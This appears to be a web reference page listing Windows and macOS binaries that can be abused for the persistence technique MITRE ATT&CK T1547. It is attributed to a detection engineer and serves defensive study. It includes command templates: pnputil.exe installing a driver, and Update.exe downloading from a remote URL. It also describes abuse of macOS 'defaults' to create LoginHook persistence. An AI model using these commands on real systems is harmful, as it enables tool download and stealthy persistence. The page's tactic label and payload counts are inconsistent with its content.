T1547Tactic: Execution & Defense EvasionOfficial MITRE ATT&CK Page

T1547: Technique T1547

Adversaries may leverage living-off-the-land techniques (T1547) to achieve execution, evade defenses, or transfer tools.

Total Capable Binaries: 3
Windows: 2
Linux: 0
macOS: 1

Living-off-the-Land Matrix for T1547

Across 3 verified binaries
Windows1 payloads

Pnputil.exe

Used for installing drivers

Sample Attack Vector:
pnputil.exe -i -a {PATH_ABSOLUTE:.inf}
Windows13 payloads

Update.exe

Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.

Sample Attack Vector:
Update.exe --download {REMOTEURL}
macOS0 payloads

defaults

Defaults reads and writes macOS user defaults and plist configuration files. Attackers abuse it to write LoginHook scripts or alter ScreenSaver preferences to achieve reboot persistence.

Sharon Ben Moshe
Curated & Verified by
Sharon Ben Moshe
Cybersecurity Researcher & Detection EngineerCheck Point